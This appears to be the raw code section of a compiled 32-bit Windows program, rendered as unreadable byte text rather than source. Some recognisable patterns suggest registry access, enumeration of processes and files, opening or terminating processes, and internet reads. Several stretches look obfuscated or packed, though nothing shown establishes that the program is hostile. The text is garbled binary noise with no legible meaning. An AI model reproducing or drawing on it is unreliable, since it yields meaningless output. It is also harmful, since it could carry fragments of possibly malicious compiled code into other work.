�x� �L$\Ƅ$�  �g� �L$HƄ$�  �  �L$4Ƅ$�  �/  �L$0Ƅ$�  �4� �L$,Ƅ$�  �#� �L$(Ƅ$�  �� �L$$Ƅ$�  �� �L$ Ƅ$�  �� �L$��$�  �� �J  �D$<3�����~`�L$��� �D$8�L$Ƅ$�  ��P�Ϳ �L$Q�=.  �D$���T$tRP��;��,  P�HpB �L$Ƅ$�   �t� F;�|��L$hǄ$�  !   �[� �L$\�L$�L$dƄ$�  #�B� �L$`Ƅ$�  "�1� �L$\Ƅ$�   � � �L$HƄ$�  �I  �L$4Ƅ$�  ��  �L$0Ƅ$�  �� �L$,Ƅ$�  �ܽ �L$(Ƅ$�  �˽ �L$$Ƅ$�  躽 �L$ Ƅ$�  詽 �L$��$�  虽 �|$�t$p�D$lG;��|$������   ��$�  _^][d�    �İ  � �L$Ƅ$�   �O� �L$hǄ$�     �;� �T$\�T$�L$dƄ$�  �"� �L$`Ƅ$�  �� �L$\Ƅ$�  � � �D$H�D$HyB �D$�t$LƄ$�  ��t&�D$P��t�8j ����)  ��Ou�t$LV蛽 ���L$4�D$H�xB Ƅ$�  �  �L$0Ƅ$�  萼 �L$,Ƅ$�  �� �L$(Ƅ$�  �n� �L$$Ƅ$�  �]� �L$ Ƅ$�  �L� �L$��$�  �<� 3��������������������j�h{=B d�    Pd�%    ��  SUV�i@W�L$�l$x�� �E3ۉD$$�?   3��|$}�\$|h   �f���$�   ��$�  Q��$pB ��4C ���3��T$|���+������у����O���ʍD$|��P�L$ 誼 PƄ$�  ��)  ���L$��$�  �c� �L$$3�;ˉD$��  ��l$x�L$(PQ����  �D$\3�;�Ƅ$�  ���y  �L$�� �L$ Ƅ$�  �� �?   3���$}  ��$|  �f���?   3���$}  ��$|  �T$X�L$f����Ƅ$�  P�߻ �D$P�O*  �D$��$�  ��$�  QRSSP�,uB ��$�  ��$�  QR�D$@h�4C P臻 �T$8��(��$|  QR�LpB �����   P�HpB �D$ �L$|PQ�T$h2C R3��F� �D$$�L$ ��SPQ�XpB ��t5jd�,pB �T$R��pB ��tjd�,pB �D$�L$SPQ�XpB �   �T$R��pB ;���  �L$ Ƅ$�  �ǹ �L$Ƅ$�  趹 F;�������L$tƄ$�  蜹 �D$h�D$�L$pƄ$�  胹 �L$lƄ$�  �r� �L$hƄ$�  �a� �L$T�D$TyB �L$�t$XƄ$�  ;�t%�D$\;�t�8S���9&  ��Ou�t$XV��� ����xB �T$@�t$T�T$�D$@�xB �D$DƄ$�  ;�t�L$HQP�B"  �T$DR輹 ���L$<�t$@Ƅ$�  �Ƹ �L$8Ƅ$�  赸 �L$4Ƅ$�  褸 �L$0Ƅ$�  蓸 �L$,Ƅ$�  肸 �L$(��$�  �r� �D$�L$$@;��D$�����L$Ǆ$�  �����I� �   ��$�  _^][d�    �ĸ  � �L$ Ƅ$�  �� �L$Ƅ$�  �� �L$tƄ$�  ��� �D$h�D$�L$pƄ$�  �ݷ �L$lƄ$�  �̷ �L$hƄ$�  軷 �L$T�D$TyB �L$�t$XƄ$�  ;�t%�D$\;�t�8S���$  ��Ou�t$XV�W� ����xB �T$@�l$T�T$�D$@�xB �t$DƄ$�  ;�t$�D$H;�t�8���<� ��Ou�t$DV�
� ���L$<�l$@Ƅ$�  	�� �L$8Ƅ$�  �� �L$4Ƅ$�  �� �L$0Ƅ$�  �� �L$,Ƅ$�  �ж �L$(��$�  ��� �L$Ǆ$�  ����謶 3��a������������������j�h�>B d�    Pd�%    ��T���   VW3��y�L$����   ��L$�D$VP��  �L$l�T$�PR�@uB ������   �L$X�D$d!   �&� �L$L�D$d �2$  �L$8�D$d�D  �L$$�D$d��  �L$ �D$d�� �L$�D$d�� �L$�D$d�ҵ �L$�D$d�ĵ �L$�D$d趵 �L$�D$d����襵 F;��9���_3�^�L$Td�    ��`� �D$�5HuB P�֋L$p���AP�փ�;���   �L$X�D$d	   �R� �T$L�T$l�L$T�D$d�<� �L$P�D$d
�.� �L$L�D$d� � �D$8�D$8yB �D$l�t$<�D$d��t$�|$@��tj ����!  ��Ou�t$<V��� ���L$$�D$8�xB �D$d�  �L$ �D$d軴 �L$�D$d譴 �L$�D$d蟴 �L$�D$d葴 �L$�D$d胴 �L$�D$d�����r� ������L$X�D$d   �\� �L$L�L$l�L$T�D$d�F� �L$P�D$d�8� �L$L�D$d�*� �T$8�D$8yB �T$l�D$<�D$d��t�L$@QP�\  �T$<R�ִ ���L$$�D$8�xB �D$d��  �L$ �D$d�ѳ �L$�D$d�ó �L$�D$d赳 �L$�D$d觳 �L$�D$d虳 �L$�D$d����舳 �L$\_�   ^d�    ��`� ����������j�h�?B d�    Pd�%    ��`�D$pUVW�p@3��L$�t$�F�|$|���D$��  ����L$WQ���  �T$�L$R�D$x    �  ����   �L$h�D$t	   �� �D$\�D$�L$d�D$t�Ҳ �L$`�D$t
�Ĳ �L$\�D$t趲 �L$H�D$HyB �L$�t$L�D$t��t*�D$P��t�8j ���  ��Ou�t$L�|$|V�P� ���L$4�D$H�xB �D$t�C  �L$0�D$t�K� �L$,�D$t�=� �L$(�D$t�/� �L$$�D$t�!� �L$ �D$t�� �L$�l$t�� �t$�   �L$�T$R�Y�������   �L$h�D$t!   �ֱ �L$\�D$t ��  �L$H�D$t��  �L$4�D$t�  �L$0�D$t螱 �L$,�D$t萱 �L$(�D$t肱 �L$$�D$t�t� �L$ �D$t�f� �L$�l$t�Y� �D$G;��|$|�$���_^�   ]�L$`d�    ��l� �L$h�D$t   �� �D$\�D$|�L$d�D$t�� �L$`�D$t��� �L$\�D$t�� �L$H�D$HyB �L$|�D$L�D$t��t�T$PRP�  �D$LP蘱 ���L$4�D$H�xB �D$t�  �L$0�D$t蓰 �L$,�D$t腰 �L$(�D$t�w� �L$$�D$t�i� �L$ �D$t�[� �L$�l$t�N� �L$l_^3�]d�    ��l� ��VW�|$��P�  ��t
_�   ^� ��0  ��t�h�4C P�@uB ����t_3�^� W���������u
_�   ^� W���>������_$ ^   � ��������������j�h�?B d�    Pd�%    QV�D$W��P�L!  ��� �Ƅ   P���D$    ���  �L$���D$�����d� ��t����  _3�^�L$d�    ��ËL$_�   ^d�    ��Ð���������j�h�?B d�    Pd�%    QV��L$��� �@QC �L$P�D$    �� ��(  �L$Ph�4C �� ��,  �L$Ph�0C �� �L$Q����  ��t*�����  �L$�D$����蛮 3�^�L$d�    ��ÍL$�D$�����x� �L$�   ^d�    ��Ð������������j�h�@B d�    Pd�%    ��h�D$xS3�W�P\�xH�HT��@;ӉL$�D$�T$�\$��  UV��xB ��L$�D$�T$PR�  3�;���$�   ��  �L$�D$(VP�`  �L$(�T$QRƄ$�   �@uB �����  �L$tƄ$�   袭 �D$h�D$$�L$pƄ$�   艭 �L$lƄ$�   �x� �L$hƄ$�   �g� �L$T�D$TyB �L$$�D$XƄ$�   ;�t�T$\RP�  �D$XP�� ���L$@�l$TƄ$�   �
  �L$<Ƅ$�   �	� �L$8Ƅ$�   ��� �L$4Ƅ$�   �� �L$0Ƅ$�   �֬ �L$,Ƅ$�   �Ŭ �L$(��$�   赬 F;�������R  ��$�   蕬 �L$0�T$<QR��$�   h2C PƄ$�   腭 ��$�   Q�   ����$�   Ƅ$�   �S� �L$tƄ$�   �B� �T$h�T$$�L$pƄ$�   �)� �L$lƄ$�   �� �L$hƄ$�   
�� �D$T�D$TyB �D$$�D$XƄ$�   ;�t�L$\QP�6  �T$XR谬 ���L$@�l$TƄ$�   �  �L$<Ƅ$�   詫 �L$8Ƅ$�   蘫 �L$4Ƅ$�   臫 �L$0Ƅ$�   �v� �L$,Ƅ$�   �e� �L$(��$�   �U� �L$Ǆ$�   �����A� �D$�L$ @;��D$�#���^]�L$p_[d�    ��t� ��� �����������U��j�hnAB d�    Pd�%    ���  SVW�   3���%���ƅ$��� �e��f��3��M��}�耭 �M�}�諪 �M��E�蟪 �u�M��E��E�   �FP蓫 Q�U�̉e�R萫 ��  �F�M�PQ�U�h2C R�}��l� ���M�WWWWjh`1C 覬 �F�M�P�E��^� �E�jP�M��E��~� � hX1C P�@uB ���M������ ��t�N�U�QhL1C R� � ���E�WWh  �jP�M��,� ��jW�΋�u��R0�E��WW���P0h   ����� �M��}��f� �M��E�薩 W�M��E��E��xB �}��E�����螪 �U�M�QhA�  R�M��E��� ��;�uq�E��xB �M��E�	�L� �M��E��xB �E��9� �M��E��m� �M��E��!� �M��E� �� �M��E�����踫 �   �M�d�    _^[��]� ���$���h   Q���P<�����_  ��t�M��q� ����RT3�;�t	�j���Ph�  �}��,pB �M��ߪ �U�E�;¾   t�u��E��xB �M��E�
�t� �M��E��xB �E��a� ;��E�   �����uh�4C �FP�DuB �����n  �F�M�PQ�U�h2C R�-� ����$����K �E�WWP��$����E�� ��pB ��$����� ;���   �M�   �Ч ��L����E���& ��L���WQ��$����E�� �U��E�RP�M�h2C Q訨 ���U�R�  ����t1��t-�E�P��j
�,pB N�ۅ�t��$���WQ�M��� }��h����M�h��  QW��$����K" %�   �E��E܍�L���u ��& �M��E��� j ��$����Y �1��& �M��E���� G� ���j ��$����3 �E�    ��@ Í�$����E�   �� �u�E܅�������V@�B���t�FH�NDjPQRh`0C j �vB �M��E��Ψ �M��E�肦 �M��E� �v� �M��E������� �M�_^3�d�    [��]� �?   3���%���ƅ$��� �u�j f�����$���h   P���R�M��_� �M؅�t�j�R���>� ��~@ Ð�������j�h�AB d�    Pd�%    ��SU��VW�L$�ɥ h�4C �D$h�4C P�D$,    ��� �L$Q�C  �T$ h2C R�`uB ��������   �-luB jj V��V�huB j j V���ՍGP�\� V��WjU�\uB V�/ �LuB ��  ��  3ۃ�4;�t�NQP��� �FP�� ���^�=�uB h 2C U�^�^�׃�;�t#Q�̉d$P�� ���	  h 2C S�׃�;�u�;�t	U趥 ���L$�D$ �����Ĥ �L$_^]3�d�    [��Ð��������d�    j�h�AB Pd�%    ��UV�t$ W��V�	  ��uQ�̉d$V蔥 ��  �-	  �L$�T� ��  3����D$    ~&��  ��Q�L$�	� h 2C �L$��� F;�|ڍL$$�� h�4C �T$(h�4C R�D$(�� �D$0P�  �L$4h2C Q�`uB ������t%�T$�����3����IVQjR�duB V�LuB ���L$$�D$ 訣 �L$�D$����藣 �L$_��^d�    ]��� �����������QSUVW��3���  ���D$~'�\$�-DuB ��  S��P�Ճ���t�D$F;�|�_^]3�[Y� _^]�   [Y� �����������j�h�AB d�    Pd�%    QVW���|$��xB �w�D$    ��t(�G��H��tS�X���΢ ��Ku�[�WR蜣 ���L$��xB _^d�    ��Ð���������������SUVW�|$�ًG�Шt�KQ���c� �d  ���Q� ���uA�s��t-�C��H��t�h���2�����Mu�CP�� ���C    3��C�C�  �K��u%��    Q�� ���CUP�+  �k�k��   �s;�G�C;�}��+Ѝ�RP�  �k��   ~ +ō4���H��t�x��������Ou�|$�k�   �C��u$�C��������}�   �=   ~�   �;�D$|�l$�T$��    P�T� �K�s���ы����ʋՃ����K�D$+э�RP�W  �KQ�� �T$�D$�|$ ���S�k�C�O�C�[����t��    ��RS�Σ _^][��� ��PS��貣 _^][��� ������j�h�AB d�    Pd�%    QVW���|$�yB �w�D$    ��t(�G��H��tS�X���~� ��Ku�[�WR�L� ���L$��xB _^d�    ��Ð���������������SUVW�|$�ًG�Шt�KQ���� �d  ���� ���uA�s��t-�C��H��t�h���������Mu�CP�Ǡ ���C    3��C�C�  �K��u%��    Q贠 ���CUP�K  �k�k��   �s;�G�C;�}��+Ѝ�RP�$  �k��   ~ +ō4���H��t�x���T�����Ou�|$�k�   �C��u$�C��������}�   �=   ~�   �;�D$|�l$�T$��    P�� �K�s���ы����ʋՃ����K�D$+э�RP�w  �KQ貟 �T$�D$�|$ ���S�k�C�O�C�[����t��    ��RS�~� _^][��� ��PS���b� _^][��� ������j�h�BB d�    Pd�%    ��S�QUV�t$,W�|$,3ۍ4������\$��4� �O�\$$�(� �O�D$$�� �O�D$$�� �O�D$$�� �O�D$$��� �o�E �xB �]�]�]�]�_,3��yB �C�C�C�C�G@�D$$�ȉD$0贝 �D$0�D$$�H裝 �L$0�D$$	��蒝 �OL�D$$
腝 V���D$(膞 �V�OR�z� �F�OP�n� �NQ�O�b� �V�OR�V� �F�OP�J� �NLQ�OL�>� �V@�O@R�2� �FD�ODP�&� �NHQ�OH�� �F �D$0    ���D$~N�T$0�D$RP�N�   Q�T$�̉d$R�D$,��  ���   �L$�D$$� �D$0�L$@;��D$0|��F43���D$~D��,�D$0UP���N   Q�T$4�̉d$R�D$,�(�  ����   �L$0�D$$�i� �D$E;�|��L$��_^]d�    [��� ���Q�A�L$V�t$����R�D$    �:� ��^Y� ���������j�h�BB d�    Pd�%    QVW��~Q�D$ �d$��P�D$    ��� W���R  �L$�D$�����Ǜ �L$��_d�    ^��� ������������j�h�BB d�    Pd�%    QVW��~Q�D$ �d$��P�D$    脜 W����  �L$�D$�����W� �L$��_d�    ^��� ������������j�h�BB d�    Pd�%    QVW��~Q�D$ �̉d$P�D$    �� W���b  �L$�D$������ �L$��_d�    ^��� ������������j�hCB d�    Pd�%    QV��t$��xB �F�D$    ��t�NQP�T� �VR�_� ���L$��xB ^d�    ��Ð���SUV�t$W�ًF�Шt�KQ���3� �<  ���!� ��3�;�u+�C;�t�SRP�� �CP��� ���{�{�{�  �K;�u%��    Q�� ���CUP�ߜ �k�k��   �s;�3�C;�}��+Ѝ�RP踜 �k�   ~+ō�PQ�r� �k�   �C;�u$�C��������}�   �=   ~�   �;�D$|�l$�T$��    P�L� �K�s���ы����ʋՃ����K�D$+э�RP�� �KQ��� �T$�D$���S�k�C�t$�K�SQRV�� _^][��� ������V��������D$t	V诙 ����^� ��V��������D$t	V菙 ����^� ��V��������D$t	V�o� ����^� ��j�h9CB d�    Pd�%    ��SUVW��M�\$(3�;ى|$ �p  C;�u9�u;�t'��I��t�YW���?  ��Ku�EP�� ���}�}�}�2  �E;�u]�<�    W��� �ϋ���3����u���ʃ����t$�;�t$���D$ t����  ��O�D$  �t$u݉]�]��   �u;�0;�}�Ӎ�+�RP��  �]�   ~+�Q��Q��   �]�   �E;�u#����������}�   �=   ~�   �;؉D$|�\$�T$��    P�'� �M�u���ы����ʋӃ����M�D$+э�RP�*  �EP�՗ �L$�T$���M�]�U�E�L$(�T$,��R�ח �L$,�D$ ����辖 �L$_^][d�    ��� ����D$��H��tV�t$W�x���u�����Ou�_^� ����������j�hiCB d�    Pd�%    ��SUVW��M�\$(3�;ى|$ �p  C;�u9�u;�t'��I��t�YW���/  ��Ku�EP��� ���}�}�}�2  �E;�u]�<�    W�� �ϋ���3����u���ʃ����t$�;�t$���D$ t����  ��O�D$  �t$u݉]�]��   �u;�0;�}�Ӎ�+�RP�"  �]�   ~+�Q��Q������]�   �E;�u#����������}�   �=   ~�   �;؉D$|�\$�T$��    P�� �M�u���ы����ʋӃ����M�D$+э�RP�  �EP�ŕ �L$�T$���M�]�U�E�L$(�T$,��R�Ǖ �L$,�D$ ����讔 �L$_^][d�    ��� ���j�h�CB d�    Pd�%    ��SUVW�ًK�l$(3�;�t$ �$  �CE;�u%;�tQP�� �CP�%� ���s�s�s��   ;�u%��    P�� ���CUP�� �k�k��   �{;�0;�}�Ս�+�RP�� �k�   ~+�Q��Q訖 �k�   �C;�u#����������}�   �=   ~�   �;�D$|�l$�T$��    P胔 �K�s���ы����ʋՃ����K�D$+э�RP�V� �CP�1� �L$�T$���K�k�S�K�T$(�D$,P���3� �L$,�D$ ������ �L$_^][d�    ��� ���������������V��������D$t	V迓 ����^� ��d�    �T$j�h�CB P��d�%    V�t$W3�����J��t,�z�t$���D$    t��舒 ��O�D$�����t$u׋L$_d�    ^��� ���d�    �T$j�h�CB P��d�%    V�t$W3�����J��t,�z�t$���D$    t���� ��O�D$�����t$u׋L$_d�    ^��� ���V���� ��^Ð���j�h�CB d�    Pd�%    QV��t$�N�D$   蹑 �N�D$ 謑 ���D$����蝑 �L$^d�    ��Ð������j�hDB d�    Pd�%    ��  UVW�L$�Y� ��$�  j h�4C ��Ǆ$�      �}� �-LpB ���D$VP��肓 P�L$Ƅ$�  � � �L$Ƅ$�   �� �T$�L$QR�Ճ��u�D$j P�\pB �P�HpB F��Vh�4C �� ����}����$T  QP�Ճ��u�?j W�\pB �P�HpB �L$Ǆ$�  ����蒐 ��$�  _^�   ]d�    �Ĕ  Ð��������������j�h+DB d�    Pd�%    ��  VW�?   3��|$�D$ �f��L$��%� ��$(  j h�4C ��Ǆ$(      �I� �=`pB ���tZ�D$h   P��3ɍT$�L$�D$�L$�D$ QQQRP�L$)�,uB �L$ �T$Qh�4C R�Ȑ �D$(�� ��Ph�4C �� j h�4C ���֐ ���t!�L$h   Q�$pB �T$��Rh�4C 趐 j h�4C ��袐 ���t�D$h   P�׍L$Qh�4C ��膐 h�4C h�4C ���u� �L$Ǆ$   ������ ��$  _^d�    ��  �j�hXDB d�    Pd�%    QV�L$�D$   �؎ �D$h2C P�D$�`uB ������t.�D$WVP���(pB PjW�duB V�LuB �L$0Q�`  ��_�L$�D$脎 �L$�D$ �v� �L$�D$�����e� �L$�   ^d�    ��Ð���������j�h�DB d�    Pd�%    ��V�L$�D$    �� h�4C �L$�D$   �,� �D$�D$P�����L$Q�g����T$h5C R�D$h2C P�� �dQC ��Qh5C �L$� � �t$ �T$R����� �D$   �L$�D$薍 �L$�D$ 舍 �L$��^d�    ���j�h�DB d�    Pd�%    ��V�L$�D$    �F� h�4C �L$�D$   �\� �D$�D$P������L$Q�����T$h 5C R�D$h2C P�� �dQC ��Qh5C �L$�0� �t$ �T$R����� �D$   �L$�D$�ƌ �L$�D$ 踌 �L$��^d�    ���j�hEB d�    Pd�%    ��V�L$�D$    �v� h�4C �L$�D$   茍 �D$�D$P������L$Q������T$h05C R�D$h2C P�B� �dQC ��Qh5C �L$�`� �t$ �T$R��� � �D$   �L$�D$��� �L$�D$ �� �L$��^d�    ��Á�  S3�S�hvB ��}�   [��  �VWj�ppB ��$  jj W�lpB ���� s1��pB P�D$hd5C P�0vB ���   �lvB _��^[��  �hP5C V�hpB ��u>�L$QPPPW�,uB �=tuB �T$,hH5C R�׃���t�D$h@5C P�׃��   ��Ѕ�}�   V�dpB �lvB _��^[��  Ð���������L$��@  �D$ PQ�LpB ���tP�HpB �D$ ��%�   ������@  �3���@  Ð������������j�hNEB d�    Pd�%    ��H  UVW�L$Ǆ$\      �^� j h�4C ��$l  Ƅ$d  臋 �=LpB �-\pB ���D$VP��$l  职 P�L$Ƅ$`  �� �L$Ƅ$\  �� �T$�L$QR�׃��u�D$j P���P�HpB F��$d  Vh�4C �� ����}���$d  �L$QR�׃��u��$d  j P���P�HpB �L$Ƅ$\   萉 ��$d  Ǆ$\  �����y� ��$T  _^�   ]d�    ��T  Ð�����j�hhEB d�    Pd�%    ��$  VW��   3��|$�D$    󫋄$<  Pj�� �������   �L$�D$$  QV�Ő ��t{��$@  �=@uB �T$(RP�׃���t%�L$QV蔐 ��tP��$@  �T$(RP�׃���u�V�0pB ��$@  Ǆ$4  ����蔈 _�   ^��$$  d�    ��0  �V�0pB ��$@  Ǆ$4  �����Z� ��$,  _3�^d�    ��0  Ð����������j�h�EB d�    Pd�%    ��,  SVW��$L  3�3��I   �|$�\$Pj�Ǆ$H      �轏 �����u��$H  ��$@  �χ 3��r�D$�D$(  PW蘏 ��t;Q��$L  �̉d$R贈 �D$P�@�������t���A��L$QW�W� ��u�W�0pB ��$H  Ǆ$@  �����[� �Ë�$8  _^d�    [��8  Ð����������j�h�EB d�    Pd�%    ��0  SUVW3ҹI   3��|$�T$R�j��$P  �Ɏ �؃��u��$P  ��$H  �ۆ 2��   �D$�D$(  PS衎 ��tp�=�pB �-�pB Q��$T  �̉d$R豇 �D$$P�=�������t0�L$ Qj h� �׋���tj V�Յ�t�T$RV��pB V�0pB �D$PS�+� ��u�S�0pB ��$P  Ǆ$H  �����/� ���$@  _^]d�    [��<  Ð�������������j�h�EB d�    Pd�%    ���L$ �D$   �ׅ �D$ �L$ Ph�5C Q�D$ �҆ ���T$�D$RPj h?  j j j hl5C h  ��pB ��u(�D$ �T$�H�Q�L$ Pjj QR�pB �D$P�pB �L$ �D$�`� �L$�D$ �R� �L$ �D$�����A� �L$�   d�    ��Ð���������D$�L$ SVWP�5pB Qj h?  j j j hl5C h  ��֋= pB �pB ��u�T$�D$RP�׋L$Q�ӍT$�D$RPj h?  j j j hl5C h  ��օ�u�L$�T$QR�׋D$P�ӍL$葄 _^[��Ð���j�h�EB d�    Pd�%    ��  VW��$(  Ǆ$       �H���u0��$(  Ǆ$   �����9� _3�^��$  d�    ��  ù?   3��|$�D$ �L$�T$3�QRVf�h?  VVV��=pB hl5C h  ��D$4   �D$0   �ׅ�u;�D$�L$P��$,  �T$Q�L$RVPQ�pB ��u�   �T$R�pB ��uk�L$�T$QRj h?  j j j hl5C h  ��D$0   �ׅ�uV�D$�L$P��$,  �T$Q�L$Rj PQ�pB ��u�   �T$R�pB ��t��$,  �D$P���7� ���*� ��$(  Ǆ$   ������� ��$  ��_^d�    ��  Ð���������j�h.FB d�    Pd�%    ��  W��$0  Ǆ$$      �� ��$,  �B���u-��$,  Ǆ$$  �����~� _��$  d�    ��$  ù?   3���$  Ƅ$   �f���?   3��|$�D$ �f�R�L$��T� �L$Ƅ$$  �� �D$�L$PQj h?  j j j hl5C h  �Ƅ$H  �pB ��tO�L$Ƅ$$  �ف �L$Ƅ$$   �ȁ ��$,  Ǆ$$  ����豁 _��$  d�    ��$  �SUV�L$詂 �T$�D$(�-pB RP�D$(j �L$$j ��$8  QR�   j P�\$8�\$<�   �Յ���   �|$(���3����It,�L$(Q�L$�M� �L$�>� �T$j R�L$�R� ���u9�L$�T$(QRj �L$$j ��$8  ��QRP�D$<�\$4P�\$<�D$H F�Յ�t����$(  Q��$@  �� �T$ R�pB �L$Ƅ$0  覀 �L$Ƅ$0   蕀 ��$8  Ǆ$0  �����~� ��$(  ^][_d�    ��$  Ð��������������j�heFB d�    Pd�%    ��H  UV3�W�L$�l$�#� �   3��|$Ǆ$\     �L$�D$TQ�D$7�D$f�D$  �M� �D$T����   �T,U�   3��|$�D$�D$2P�T$H�� �   3��|$�T$�L,U��5C �L$D������+��D$3���������ȃ��L$�D$XRC Qf�D$ X�Ƈ ��uC�\RC 3Ҋ�%�   RP3�3ɠ[RC �ZRC P�XRC 3�Q��%�   RP�D$$h�5C P�6� �� �L$TE���   ;��+�����$d  �T$R���� �D$   �L$Ƅ$\   ��~ ��$T  ��_^]d�    ��T  Ð�����V�t$V��pB �t3�^èt3�^èt3�^���t3�^è@t3�^�j h   jj jh   �V��pB �����u�   ^ÍD$W�L$ P�T$QRV��pB V���0pB ��_���^$���Ð��������D$P�<pB j �4uB P�0uB ���[  ��   �����  f�T$�C  ��   ��Bf�T$
�0  ��   ��Bf�T$�  ���  ��f�T$�  ��<   ��f�T$��  ��<   ��f�T$��  ��   ���D$f�T$�T$ RP��pB �D$�L$ PQPQPQ�L$4Q������4Ð��������������L$��  UW� 3�WWWjh`1C �`vB �����   ��$  VWh  �WWPU�\vB ����tZ�   3��|$�D$ �=PvB �L$�T$Qh   RV�׋L$��v��t�D$�D ��$  P� ��V�   �XvB U�XvB ��^_]��  Ë�_]��  Ð������������U��j�h�FB d�    Pd�%    ��   SVW�M��E�    �P| �E�   �	' �K5 ���� �׃��5 ��w��@�E�����Vh��^�� ���� �fD0j��(�r���� ��h��s�Y�O� �� 27O����$Vh
,�G^����c���?�+���^�%�2} �]4�D�(�$X�� ��Z  1X�ˀ(��u�U�R���| �E�   �M��E� �{ �M��_^d�    [��]Ð���������U��j�h�FB d�    Pd�%    ��VW��������}���} �M�} �M�} �M�} �M�{} �M�s} �M��{ �E��E�    P�Q����M��E�Q�  ������tV�M���{ V�{ ���U��B���u-�M��E� �z �M��E������z _3�^�M�d�    ��]�S�M��z �j h�0C �M��]��{ �������  V�Ej P�M��a} P�M��E��\{ �M�]��Iz �M�Q���^{ F�M�Vh�0C �m{ ������Z  �׍E+֍M�RVP�} P�M��E��{ �M�]���y �M�Q�M�{ �w�M�Vh�0C �{ ������  �׍E+֍M�RVP��| P�M��E��z �M�]��y �M�Q�M�z �w�M�Vh�0C ��z �������   �׍E+֍M�RVP�n| P�M��E��iz �M�]��Vy �M�Q�M�jz �w�M�Vh�0C �wz �����th�׍E+֍M�RVP� | P�M��E��z �M�]��y �M�Q�M�z G�UWR�M���y P�M��E���y �M�]���x �E�MP��y �M��E��x �M��E� �x �M��E������x ��������M�[_�   ^d�    ��]Ð��������������U��j�hPGB d�    Pd�%    ��SVW�x �ă �����;�[�\� �P� �� P����$�o����~ �V� �F�=p� hg{�ˉ,$�.	 �迬��6�����/U�S�� �$X�T A$� cl�`׉$�6�� �s���k� 6�W3M����� (��	M01�i� ���M0/�C� ��ԥ����n��Á�����X ��/ ��x 8�9�I��j. #��`��h���Z��Ӓ�Z���a���W^��# ��Gv�����E���� �E�� �n] �$X��f���f �. �f��J �Q�h�]��Y�=> ��Sh9���[�����$�V� �� �d����	
Ў��`]_���fF�dM ؋��%�  ���� ��? ��f���������~��f3����a� ��)O�'��	��PѠ� 	��� �Ϊ �.����urU���� ���-� �D   f/��M�_^�   d�    [��]Ð��U���  VW�   3�������ƅ���� ��U� ��� 4�JU��� KmeL�Ł�K��<$��� �| �� �WK ��R �ZW 虄���� �$[�$ÁÙr��$�ٙ �w 堷�l���$�E�    �Wl��鹅 ���bp�S� �   ��@0��l�ޮ�E_^��]Ð����U��j�h�GB d�    Pd�%    ��  S3�VW�]�M��E�   �+u �?   3��������������f���E�E�9X�u�uhLRC ���$v �E�   �D  �Q �� Eb�T��( �d� 3�?�Q���;v �G.�Q`k��) ��� �Y ���h ����0����w� �A� ����� v ��y���� ����; `��u ���|V@�[��x¬�Å�(��>� ��dעϩ}��% ��8O Rh8hMZ��,fI�K� �  9����� -U2G0��Z� ��A0�螤 E�:u��b #����� �|(P��s� �� � �������a�躙 ��ln^�\�$Y�E��   ��,�x�u�E�P����t �E�   �M��E��s �M�]��s �M��_^d�    [��]Ð�������������U��j�h�GB d�    Pd�%    ��  SV3�W�M��]��Bs �M��E�   �3s �?   3��������������f��E���t0 ��0E��� �W �* �X� �kx ��) G��6N�������F�9N ��B �)��� ���� ��}� �W� ���9��謓 �t �qzQ`Y�� r�N%U�a���h�ԸWh E �h �lt@А�ǰ�ڝ�<$��  ����� �"� �_6���� �ܧ i"�L��* �{��I�jVh4s��^��j���|,89�ƀ   鄶 �Z@U�$蜧 5W6��jT �Ʀ���)LUD���9� WY��  �N �c�uBpK�$XPj h��C �� �T ��� �j� �A�dW�3�$YQ���C� ��s 9������ ����ZpQ���:��� ��� ������ � �� 	�� z ��   ��L�M�q�u�M�Q���ir �E�   �M��E��Bq �M��]��7q �M��_^d�    [��]Ð�������������U��j�h/HB d�    Pd�%    ��d  VW�E�    �M��E�   ��p �M��E���p �Eh�5C �M�PQ�E���s P�M��E��q �M��E��p �M��s �E��� h_�[Y��gsl�́�&�����3 =�   �_� �_? ��� �2� �� ����?z h�:�X��up���B��Ł�l.���, �$[P�hj�`��T ��d�� �dO ���T���x ��$������hP���� lA����a�hR�O^ ���3J��[ P�����C �� ���(� �+ �g ��<$�  ��( ��<$U酱 [�j� ������U��,$���` �) �4 ��5��� 	 V��O jwY�9�^35� @ ��M��4$�� �5�H��_��� �e��d
��ǿ(�b�QW�  L�eĚ�'_��	�u�U�R��� p �E�   �M��E��cq �M��E���n �M��E���n �M�E� ��n �M��_^d�    ��]Ð�������������xuB lQC Ð��d�    j�hvHB P�T$d�%    ��X����SU�l$tV��W�L$x��$�   �V3ہ�  ���F�~�n�^ yJ���B��   �D$xS�L$�D$��tB ��6C ���3�j���I��L$U��sB ��t$�|$�͋Ѿ�6C ����U���L$��tB �D$x�L$0P�\$t�D$|LRC ��uB �L$S�L$@�L$@�D$t��tB ��tB �L$�PSQ�L$H��tB ��tB �D$0hh�B P�T$8�\$x�s 9YX��   ��R�T
������   ��|1;�|-PU� uB �_�H�^�N�L$d�^��^][d�    ��d� �T$xS�L$$�T$$��tB �p6C ���3�j���I�ٍL$$S��sB ��t$�|$$�ˋ��p6C ����S���L$$��tB �L$x�   Q�L$P�\$t�D$|LRC ��uB �T$ �L$XR�D$t�uB ��tB �L$Lhh�B Q�D$T�\$x�r �T$xS�L$�T$��tB �06C ���3�j���I��L$U��sB ��t$�|$�͋��06C ����U���L$��tB �L$x�D$p   Q�L$4�D$|LRC ��uB �T$S�L$@�D$t�T$@��tB ��tB �T$�QSR�L$H��tB ��tB �L$0hh�B Q�D$8�D$x��q �d�    j�h�HB Pd�%    ��,S�\$DUV���W��u�]����  �};���  �} u3��   �U�M�ɍ�D$P��   �u;���   �M ��@�Dt$�E �E�u�|$L+������ʃ���V�EW�P� uB �M �u�D$P�Q�Ήu;�~	�U�E 벋u�}����|$L�����ʃ��E�E   �ËL$<_^][d�    ��8� �u�|$L�������ʃ��E��;E|݋M ��@�D�;����EWP� uB �M �D$P��q�M���u;։T$P~E�E�u+���D$L�ыً����E �˃��M�u�<�����ȃ��E��J����U�u�|$L+ʋ������ʋT$L���u��+ȍ<�����ȃ��L$P�E    �M������D$L��6C �D$���3�3����Ij�ٍL$S�l$�l$ �l$$��sB ��t$�|$�ˋѾ�6C ����S���L$��tB �D$L�L$ P�l$H�D$PLRC ��uB �L$��tB �L$,�l$0�l$4�l$8��L$PUQ�L$8�D$P��tB ��tB �D$ hh�B P�T$(�D$L �o ���D$%�   �ȃ�����7C �L$���7C �A�A Ð�����T$�<0|<9,0�
